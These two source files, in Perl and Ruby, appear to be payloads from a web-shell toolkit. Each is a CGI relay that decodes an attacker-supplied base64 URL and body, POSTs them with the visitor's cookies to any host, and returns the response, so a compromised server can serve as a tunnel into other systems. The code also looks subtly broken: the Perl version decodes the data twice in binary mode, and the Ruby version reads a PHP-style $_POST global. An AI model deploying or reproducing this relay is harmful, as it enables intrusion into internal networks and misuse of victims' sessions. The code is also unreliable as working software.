File: Payload/Perl/CGI/OneShell/comet.pl
use strict;
use warnings;
use CGI;
use MIME::Base64;
use LWP::UserAgent;
use HTTP::Request;

sub main {
    my $q = CGI->new;

    my $z0 = $q->param('z0') // '';
    my $z1 = $q->param('z1') // '';
    my $z2 = $q->param('z2') // '';

    my $url     = decode_base64($z0);
    my $data    = decode_base64($z1);
    my $mode    = decode_base64($z2);
    my $cookies = $ENV{'HTTP_COOKIE'};

    $url =~ s/^\s+|\s+$//g if $url;

    if (!$url || $url eq '') {
        return;
    }

    my $ua = LWP::UserAgent->new;
    $ua->timeout(15);
    $ua->env_proxy;
    $ua->agent("Mozilla/5.0");

    my $req = HTTP::Request->new(POST => $url);

    if ($mode eq 'binary') {
        $req->header('Content-Type' => 'application/octet-stream');
        $req->content(decode_base64($data));
    } else {
        $req->header('Content-Type' => 'application/x-www-form-urlencoded');
        $req->content($data);
    }

    if ($cookies) {
        $req->header('Cookie' => $cookies);
    }

    my $response = $ua->request($req);

    foreach my $header ($response->header('Set-Cookie')) {
        print "Set-Cookie: $header\r\n" if defined $header;
    }

    my $body = $response->content;
    if ($mode eq 'binary') {
        $body = encode_base64($body, '');
    } else {
        $body = $response->decoded_content // $response->content;
    }

    print $body;

    return;
}

main();

File: Payload/Ruby/CGI/OneShell/comet.rb
# $_POST: global variable

require 'base64'
require 'net/http'
require 'uri'

def http_post(url_str, data, mode, cookies)
  unless url_str.start_with?('http://', 'https://')
    url_str = "http://#{url_str}"
  end

  uri = URI.parse(url_str)
  http = Net::HTTP.new(uri.host, uri.port)
  http.use_ssl = (uri.scheme == 'https')
  http.read_timeout = 15

  if mode == 'binary'
    request = Net::HTTP::Post.new(uri.request_uri)
    request['Content-Type'] = 'application/octet-stream'
    request.body = Base64.decode64(data)
  else
    request = Net::HTTP::Post.new(uri.request_uri)
    request['Content-Type'] = 'application/x-www-form-urlencoded'
    request.body = data
  end

  if cookies && !cookies.empty?
    request['Cookie'] = cookies
  end

  response = http.request(request)

  response.each_header do |key, value|
    if key.downcase == 'set-cookie'
      print "Set-Cookie: #{value}\r\n"
    end
  end

  body = response.body
  if mode == 'binary'
    body = Base64.strict_encode64(body)
  end

  [response.code.to_i, body]
rescue => e
  [0, "Error: #{e.message}"]
end

def main
  url   = Base64.decode64($_POST['z0'])
  data  = Base64.decode64($_POST['z1'])
  mode  = Base64.decode64($_POST['z2'])
  cookies = $_POST['HTTP_COOKIE']

  return if url.empty?

  http_code, body = http_post(url, data, mode, cookies)
  print body
  
  return
end

main